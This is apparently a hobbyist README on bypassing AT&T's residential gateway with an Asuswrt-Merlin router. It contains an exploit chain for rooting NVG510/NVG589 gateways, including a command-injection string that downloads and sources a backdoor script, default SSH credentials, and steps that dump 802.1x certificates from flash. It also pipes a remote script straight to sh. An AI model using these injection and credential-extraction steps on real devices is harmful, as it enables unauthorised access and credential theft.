BypassAttRG
Using Asuswrt-Merlin to bypass AT&T's residential gateway. (rt-ac68u <--> BGW210 <--> ONT)
This method only requires Asuswrt-Merlin. No pfSense, or netgraph, or ubiquiti devices, or dumb switch needed.
I only tested with rt-ac68u, but the method should work for all Asuswrt-Merlin based wireless routers (Please let me know if it doesn't).
Now, the home router connects optical network terminal(ONT) directly. You should setup the firewall wisely.
Menu
- Prerequisites
- Extract Certificates
- Configuring 802.1x authentication
- Miscellaneous
- Credits & References
Prerequisites
- Python 3 for the local http server. There are many alternatives(e.g. mobaxterm).
- Basic knowledge of POSIX commands (cd, mkdir, wget, etc.).
- A NVG510 or NVG589
Extract Certificates
The certificates extracted from both NVG510 and NVG589 work, however NVG510 costs less and is easier to root.
NVG510
Rooting
Credit: earlz
- Downgrade firmware to 9.0.6h2d30 if necessary. Known vulnerable firmwares are:
- NVG510 9.0.6h2d30
- NVG510 9.0.6h2d21
- NVG510 9.0.6h048
- Follow this guide Rooting The NVG510 from the WebUI.
If NVG510 has no connection to internet, you may want to setup a local http server for NVG510 to download the script- Download http://earlz.net/static/backdoor.nvg510.sh to your local machine
- Use Python to setup a simple http server.
python -m http.server
orpython -m SimpleHTTPServer
for Python2 - In the page source of the ATT firmware update page http://192.168.1.254/cgi-bin/update.ha look for the word
nonce
and copy the value shown in quotes. This value changes every time the page is loaded! Example:815a0aaa0000176012db85d7d7cac9b31e749a44b6551d02
- In the text box on the earlz control2 page, change the command to
errrr && wget http://YOUR_LOCAL_IP:8000/backdoor.nvg510.sh -O /tmp/backdoor.sh && source /tmp/backdoor.sh && errr
- Login
telnet 192.168.1.254 28
. The username is admin and the password is your modem's access code written on the label of the modem - Once connected, type
!
to switch to a root shell
Extract Certificates
- Download busybox-mips to your local device.
- Start Python http server.
python -m http.server
orpython -m SimpleHTTPServer
for Python2 - In NVG510,
wget https://YOUR_LOCAL_IP:8000/busybox-mips -O /tmp/busybox
chmod +x /tmp/busybox
/tmp/busybox dd if=/dev/mtdblock4 of=/tmp/mfg.dat bs=1k
mkdir /tmp/images
mount -o blind /tmp/images /www/att/images
cp /tmp/mfg.dat /www/att/images
cd /tmp
tar cf cert.tar /etc/rootcert/
cp cert.tar /www/att/images
- Download http://192.168.1.254/images/mfg.dat and http://192.168.1.254/images/cert.tar to your local device
NVG589
Rooting
Credit: nomotion
- If your firmware version <= 9.1.0h12d15_1.1, the following method may work for you. (I didn't test this method.)
A complete bricking guide for Motorola/Arris NVG589. - Otherwise, downgrade(upgrade) to 9.2.2h0d83.
- Reset NVG589 and
ssh [email protected]
(password:5SaP9I26
)- If ssh is not enabled at this time, upgrade to 9.2.2h4d16 with ONT interface connected to AT&T's ONT.
- Wait a bit, AT&T may start upgrade your NVG589's firmware.
- At the time of this writing, it upgraded to 9.2.2h11d22.
- If not, manually upgrade to 9.2.2h11d22.
- When you see it is upgrading (power LED turns amber, and other LEDs are off), disconnect ONT cable.
- Downgrade back to 9.2.2h0d83.
- Now ssh should be enabled. Please let me know if you find an easier and simpler method.
- In NVG589, run the following commands in order. (Credit: samlii@dslreports)
ping -c 1 192.168.1.254;echo /bin/nsh >>/etc/shells ping -c 1 192.168.1.254;echo /bin/sh >>/etc/shells ping -c 1 192.168.1.254;sed -i 's/cshell/nsh/g' /etc/passwd
- Exit
exit
and shh backssh [email protected]
(password:5SaP9I26
) - Type
!
. It switches to root shell.
Extract Certificates
- In NVG589, run the following commands in order. Make sure you are in root shell.
mount mtd:mfg -t jffs2 /mfg && cp /mfg/mfg.dat /tmp/ && umount /mfg cd /tmp tar cf cert.tar /etc/rootcert/ cp cert.tar /www/att/images cp /tmp/mfg.dat /www/att/images
- Download http://192.168.1.254/images/mfg.dat and http://192.168.1.254/images/cert.tar to your local device.
BGW210
Credit: Streiw
Configuring 802.1x authentication
Decode Credentials
Credit: devicelocksmith
- Download decoder v1.0.4: win, linux, mac
- Copy mfg.dat, unzip cert.tar to the same location as mfg_dat_decode.
- Run mfg_dat_decode. You should get a file like this: EAP-TLS_8021x_XXXX.
Update wpa_supplicant in Asuswrt-Merlin
I cannot use the build-in wpa_supplicant v0.6 in Asuswrt-Merlin to achieve my goal, so I compiled the wpa_supplicant v2.7 from Entware repository. Here I provide the necessary binary files. If you are working on a different model, you may need to compile wpa_supplicant from the source. check this.
- Start python http server.
python -m http.server
- ssh to your router. (You need to enable ssh in the web GUI.)
- Download the packages and unzip it.
wget https://raw.githubusercontent.com/bypassrg/att/master/packages.tar.gz && tar -xzf packages.tar.gz
- Download EAP-TLS_8021x_XXXX file from your local http server.
wget https://YOUR_LOCAL_IP:8000/EAP-TLS_8021x_XXXX.tar.gz
- Unzip and copy files to /jffs/EAP.
mkdir /jffs/EAP && tar xzf EAP-TLS_8021x_XXXX.tar.gz -C /jffs/EAP
- Modify wpa_supplicant.conf. Set *.pem to the absolute path.
ca_cert="/jffs/EAP/CA_XXXX.pem" client_cert="/jffs/EAP/Client_XXXX.pem" private_key="/jffs/EAP/PrivateKey_PKCS1_XXXX.pem"
- Unzip and copy files to /jffs/EAP.
- Install Entware in your router.
- Install in the usb drive. Entware
- Install in jffs. Run this script: entware_jffs.sh
wget -O - https://raw.githubusercontent.com/bypassrg/att/master/entware_jffs.sh |sh
- Check your router's architecture
uname -rm
. If you are not using armv7, you must use the correct Entware installation script. - Deploying Entware
- Replace the URL in entware_jffs.sh accordingly.
- Check your router's architecture
- Install wpa_supplicant and dependencies.
opkg update opkg install libubox echo -e "\ndest opt /opt" >> /opt/etc/opkg.conf opkg install -d opt libubus_2018-10-06-221ce7e7-1_armv7-2.6.ipk opkg install -d opt hostapd-common_2018-12-02-c2c6c01b-6_armv7-2.6.ipk opkg install -d opt wpa-supplicant_2018-12-02-c2c6c01b-6_armv7-2.6.ipk opkg install fake-hwclock echo -e "\n/opt/usr/sbin/wpa_supplicant -s -B -Dwired -ieth0 -c/jffs/EAP/wpa_supplicant.conf" >> /opt/etc/init.d/rc.unslung
Configure Asuswrt-Merlin via web GUI
- In WAN tab, set MAC Address to identity value which you can find in wpa_supplicant.conf.
Enable AiProtection.- I guess this sets VLAN tag to the network traffic, so we don't need pfSense or netgraph.
- IPv6: set Connection type to Native
Debug
- If it is the first time to use the certificates, it takes several rounds of authentication. Just wait.
- check /tmp/syslog.log in the router.
- Manually start wpa_supplicant with debug option.
/opt/usr/sbin/wpa_supplicant -dd -Dwired -ieth0 -c/jffs/EAP/wpa_supplicant.conf
Miscellaneous
Compile Entware packages from source
Some useful links
FAQ
- Q: Slow Speed: The speed doesn't reach to the speed that I subscribed to.
A: Please make sure the NAT acceleration is enabled. (Web GUI -> Tools-> HW acceleration). If it says incompatible with, you need to turn off some services.
Credits & References
- devicelocksmith: EAP-TLS credentials decoder and the method to extract /mfg/mfg.dat
- earlz: Rooting The NVG510 from the WebUI
- nomotion: NVG589 root exploit
- dslreports.com: A great forum with many useful information.
- [email protected]: Provides many helpful & useful suggestions.